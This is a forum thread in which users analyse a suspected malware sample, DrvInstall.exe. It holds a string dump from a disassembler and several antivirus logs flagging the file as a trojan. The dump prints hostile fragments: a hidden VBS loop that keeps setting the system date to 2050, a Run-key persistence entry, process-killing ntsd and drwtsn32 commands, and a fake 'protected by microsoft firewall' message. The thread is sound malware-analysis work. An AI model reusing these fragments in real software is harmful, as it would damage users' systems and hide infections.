[1DEA85]

IllusionWing

这作者也够无聊的...
Ultra String Reference
Address    Disassembly                               Text String
00401710   push    00402E34                          (initial cpu selection)
00404732   push    004036B8                          \*.#.exe
004047B7   push    004036D0                          .#.exe
004048D8   push    004036E4                          \
00404A54   push    004036E4                          \
00404BB1   push    004036E4                          \
00404F44   push    004036B8                          \*.#.exe
00404F9B   push    00403708                          c:\vbvirus\ownerprotect.ptt
0040509F   push    00403774                          c:\905c0769f9a06c95a24ddf945\
0040528D   push    004037C8                          c:\905c0769f9a06c95a24ddf945\patcher.exe
00405296   push    004036E4                          \
004052C3   push    004037B4                          .exe
0040531B   push    004037C8                          c:\905c0769f9a06c95a24ddf945\patcher.exe
0040532D   push    00403844                          c:\905c0769f9a06c95a24ddf945\mssat.exe
00405332   push    00403820                          c:\ntdetect.com
00405346   push    00403844                          c:\905c0769f9a06c95a24ddf945\mssat.exe
00405414   mov     edx, 00403898                     all users
0040542C   push    004038B0                          c:\documents and settings\
0040544A   push    004038EC                          \local settings\temporary internet files\content.ie5\aaaaaaaa\
004054C3   push    004038B0                          c:\documents and settings\
004054E1   push    004038EC                          \local settings\temporary internet files\content.ie5\aaaaaaaa\
00405545   push    00403970                          .vbs
004055A0   push    00403988                          on error resume next
004055C2   push    004039C4                          dim s,p
004055E4   push    004039D8                          set s=createobject("wscript.shell")
00405606   push    00403A24                          do until(left(p,4) ="2050")
00405628   push    00403A60                          p=date
0040564A   push    00403A74                          s.run "cm" & "d.ex" & "e" & " /c" & "dat" & "e 2050-12-31" , vbhide
0040566C   push    00403B00                          loop
0040569D   push    00403B10                          wscript.exe "
004056B8   push    00403B30                          "
00405703   push    00403B38                          wscript.shell
0040572D   mov     dword ptr [ebp-BC], 00403B5C      hkey_local_machine\software\microsoft\windows\currentversion\run\drvinstall
00405741   mov     dword ptr [ebp-DC], 004037C8      c:\905c0769f9a06c95a24ddf945\patcher.exe
004057B5   push    00403BF4                          regwrite
004057E5   mov     edx, 00403C0C                     cdefghijklmnopqrstuvwxyz
00405A45   push    004036E4                          \
00405A72   push    004037B4                          .exe
00405CD8   push    004036E4                          \
00405D05   push    004037B4                          .exe
00405D97   push    00403C44                          c:\
00405DD2   push    00403C44                          c:\
0040600C   push    004036E4                          \
00406082   push    00403C60                          $
0040631B   push    00403C78                          ntsd.exe -pn
00406374   push    00403C98                          drwtsn32.exe -p
004064F0   push    00403CC0                          *.exe
004066AB   mov     dword ptr [ebp-78], 00403CD0      :\systemlog.bak
00406707   push    00403CF4                          (system config data)
00406719   push    00403D24                          msg = all of your file is protected by microsoft firewall..
0040675E   mov     dword ptr [ebp-78], 00403DA0      :\ntdetect.exe
004067DC   mov     dword ptr [ebp-78], 00403CD0      :\systemlog.bak
00406858   mov     dword ptr [ebp-78], 00403DA0      :\ntdetect.exe
00406F33   push    004036E4                          \
00406F60   push    004037B4                          .exe
004070BA   push    004036E4                          \
00407130   push    00403C60                          $
004073BB   mov     edx, 00403C0C                     cdefghijklmnopqrstuvwxyz
0040746B   push    00403E14                          :\
004074C8   push    00403E14                          :\
0040771D   push    004036E4                          \
00407793   push    00403C60                          $

king6808

已检测: 病毒 Virus.Win32.VB.gn        URL: http://bbs.kafan.cn/attachment.php?aid=122369/DrvInstall.exe

scottxzt

Begin scan in 'C:\Documents and Settings\dell\桌面\DrvInstall.zip'
C:\Documents and Settings\dell\桌面\DrvInstall.zip
  [0] Archive type: ZIP
  --> DrvInstall.exe
      [DETECTION] Is the Trojan horse TR/Agent.40960.52
      [INFO]      The file was successfully wiped!
      [INFO]      The file was deleted!

timhas266

Starting the file scan:

Begin scan in 'C:\Documents and Settings\tim\桌面\DrvInstall.zip'
C:\Documents and Settings\tim\桌面\DrvInstall.zip
  [0] Archive type: ZIP
  --> DrvInstall.exe
      [DETECTION] Is the Trojan horse TR/Agent.40960.52
      [INFO]      A backup was created as '4751cff1.qua'  ( QUARANTINE )
      [INFO]      The file was deleted!

gho

2007-9-3        17:11:03        Moved (Clean failed because the file isn't cleanable)         WHUT-D9193C067E\gho        WinRAR.exe        C:\Documents and Settings\gho\桌面\DrvInstall.exe        New Malware (Virus)

timhas266

Starting the file scan:

Begin scan in 'C:\Documents and Settings\tim\桌面\DrvInstall.zip'
C:\Documents and Settings\tim\桌面\DrvInstall.zip
  [0] Archive type: ZIP
  --> DrvInstall.exe
      [DETECTION] Is the Trojan horse TR/Agent.40960.52
      [INFO]      A backup was created as '4751f81f.qua'  ( QUARANTINE )
      [INFO]      The file was deleted!